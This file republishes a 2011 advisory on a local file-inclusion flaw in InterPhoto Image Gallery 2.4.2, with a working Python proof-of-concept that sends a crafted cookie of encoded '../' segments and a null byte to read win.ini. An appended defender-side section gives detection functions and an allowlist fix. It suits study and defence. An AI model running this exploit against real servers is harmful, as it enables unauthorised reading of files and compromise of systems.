
56 lines
No EOL
2.1 KiB
Python
Executable file
source: http://www.securityfocus.com/bid/46759/info

InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected.

# ------------------------------------------------------------------------
# Software................InterPhoto 2.4.2
# Vulnerability...........Local File Inclusion
# Threat Level............Critical (4/5)
# Download................http://www.weensoft.com/
# Release Date............3/4/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ........................Bryce Darling <bryce@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A local file inclusion vulnerability in InterPhoto 2.4.2 can be
# exploited to include arbitrary files.
#
#
# --PoC--

import socket

host = 'localhost'
path = '/interphoto'
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

# The IPLANG... cookie value reaches an include() unsanitized: the eight
# '../' segments climb to the drive root and the trailing %00 truncates
# whatever suffix the application appends, so about.php returns win.ini.
request = ('POST ' + path + '/about.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 0\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n')
s.sendall(request.encode())

# Response body should contain the included file if the target is vulnerable.
print(s.recv(8192).decode(errors='replace'))
s.close()
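As an added defender-side example, not part of the original advisory or PoC: a small Python check that flags cookie values shaped like the IPLANG payload the request above sends (URL-encoded traversal plus a null byte) and the allowlist test a fixed language switch should apply instead of using the value as a path. The cookie name is taken from the PoC; the sample values and the language allowlist are constructed assumptions, not InterPhoto's real data.

```python
import re
from urllib.parse import unquote

COOKIE_NAME = "IPLANGV6O1or24t6cI"   # cookie the PoC request above sets
# Constructed sample values: the PoC's payload and an ordinary language code.
ATTACK_VALUE = "..%2f" * 8 + "windows%2fwin.ini%00"
BENIGN_VALUE = "en"
# Assumed allowlist for illustration; not InterPhoto's real language table.
ALLOWED_LANGS = {"en", "de", "fr"}


def decode_param(value, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def lfi_indicators(value):
    """List the file-inclusion traits present in one parameter value."""
    decoded = decode_param(value)
    found = []
    if "\x00" in decoded:
        found.append("null-byte")       # truncates the include path on old PHP
    if re.search(r"(^|[\\/])\.\.([\\/]|$)", decoded):
        found.append("traversal")       # '../' or '..\' segments
    if decoded.startswith(("/", "\\")) or re.match(r"[A-Za-z]:[\\/]", decoded):
        found.append("absolute-path")
    if re.search(r"(?i)(win\.ini|boot\.ini|/etc/passwd)", decoded):
        found.append("sensitive-file")
    return found


def parse_cookie_header(header):
    """Minimal 'a=b; c=d' Cookie header parser (no quoting support)."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            key, val = part.strip().split("=", 1)
            pairs[key] = val
    return pairs


def is_allowed_lang(value):
    """Server-side fix: accept only allowlisted codes, never a path."""
    return decode_param(value) in ALLOWED_LANGS
```

Run `lfi_indicators` over each value returned by `parse_cookie_header` on the request's Cookie line to triage logged requests; `is_allowed_lang` is the shape of check the application itself should have applied.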